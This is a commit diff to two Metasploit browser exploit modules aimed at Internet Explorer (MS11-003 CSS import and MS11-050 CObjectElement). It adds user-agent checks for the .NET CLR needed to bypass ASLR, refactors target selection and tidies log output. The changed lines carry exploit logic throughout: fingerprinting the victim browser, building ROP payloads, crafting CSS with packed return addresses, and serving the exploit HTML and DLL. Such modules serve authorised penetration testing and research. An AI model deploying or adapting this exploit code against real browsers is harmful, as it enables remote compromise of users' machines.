Add checks for .NET requisites

Also standardizes print_status format to look nicer with lots of cilents

modules/exploits/windows/browser/ms11_003_ie_css_import.rb

@@ -22,7 +22,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		:ua_maxver  => "8.0",
 		:javascript => true,
 		:os_name    => OperatingSystems::WINDOWS,
-		:vuln_test  => nil, # no way to test without just trying it
+		# Not strictly a vuln check, but an exploitability check since a
+		# specific version of .NET is required to make the ROP work.
+		:vuln_test  => "if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)) { is_vuln = true }else{ is_vuln = false }",
 	})
 
 	def initialize(info = {})
@@ -152,27 +154,30 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		agent = request.headers['User-Agent']
 		#print_status("Checking user agent: #{agent}")
-		if agent !~ /\.NET CLR 2\.0\.50727/
-			print_error("#{cli.peerhost}:#{cli.peerport} Target machine does not have the .NET CLR 2.0.50727")
-			return nil
-		end
-
 		if agent =~ /MSIE 6\.0/
 			mytarget = targets[3]
 		elsif agent =~ /MSIE 7\.0/
-			mytarget = targets[2]
+			mytarget = ua_has_clr(cli,agent) ? targets[2] : nil
 		elsif agent =~ /MSIE 8\.0/
-			mytarget = targets[1]
+			mytarget = ua_has_clr(cli,agent) ? targets[1] : nil
 		else
-			print_error("#{cli.peerhost}:#{cli.peerport} Unknown User-Agent #{agent}")
+			print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
 		end
 		mytarget
 	end
 
+	def ua_has_clr(cli, agent)
+		if agent =~ /\.NET CLR 2\.0\.50727/
+			return true
+		end
+		print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target machine does not have the .NET CLR 2.0.50727")
+		false
+	end
+
 
 	def on_request_uri(cli, request)
 
-		print_status("#{cli.peerhost}:#{cli.peerport} Received request for %s" % request.uri.inspect)
+		print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Received request for %s" % request.uri.inspect)
 
 		mytarget = target
 		if target.name == 'Automatic'
@@ -183,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 		end
 
-		#print_status("#{cli.peerhost}:#{cli.peerport} Automatically selected target: #{mytarget.name}")
+		#print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Automatically selected target: #{mytarget.name}")
 
 		buf_addr = mytarget.ret
 		css_name = [buf_addr].pack('V') * (16 / 4)
@@ -193,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		uni_placeholder = Rex::Text.to_unicode(placeholder)
 
 		if request.uri == get_resource() or request.uri =~ /\/$/
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} redirect")
+			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect")
 
 			redir = get_resource()
 			redir << '/' if redir[-1,1] != '/'
@@ -205,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			# Re-generate the payload
 			return if ((p = regenerate_payload(cli)) == nil)
 
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} HTML")
+			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML")
 
 			# Generate the ROP payload
 			rvas = rvas_mscorie_v2()
@@ -309,7 +314,7 @@ EOS
 			send_response(cli, html, { 'Content-Type' => 'text/html' })
 
 		elsif request.uri =~ /\.dll$/
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} .NET DLL")
+			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending .NET DLL")
 
 			# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
 			# use it's contents ...
@@ -340,7 +345,7 @@ EOS
 			css = "\xff\xfe" + Rex::Text.to_unicode(css)
 			css.gsub!(uni_placeholder, css_name)
 
-			print_status("#{cli.peerhost}:#{cli.peerport} Sending #{self.refname} CSS")
+			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending CSS")
 
 			send_response(cli, css, { 'Content-Type' => 'text/css' })
 

modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb

@@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		:ua_maxver  => "8.0",
 		:javascript => true,
 		:os_name    => OperatingSystems::WINDOWS,
-		:vuln_test  => nil,
+		# If it's IE 8, then we need .net to bypass ASLR
+		:vuln_test  => %Q|
+			if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
+				if (/.NET CLR 2\\.0\\.50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
+			}
+		|,
 	})
 
 	def initialize(info={})
@@ -153,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			mytarget = auto_target(cli, request)
 			if mytarget.nil?
 				agent = request.headers['User-Agent']
-				print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
+				print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
 				send_not_found(cli)
 				return
 			end
@@ -175,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			</html>
 			DATA
 
-			print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+			print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Triggering vulnerability (target: #{mytarget.name})...")
 			send_response(cli, data, { 'Content-Type' => 'text/html' })
 			return
 		end
@@ -297,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		</html>
 		HTML
 
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} (#{mytarget.name})...")
+		print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit (#{mytarget.name})...")
 		send_response(cli, html, {'Content-Type'=>'text/html'})
 	end
 end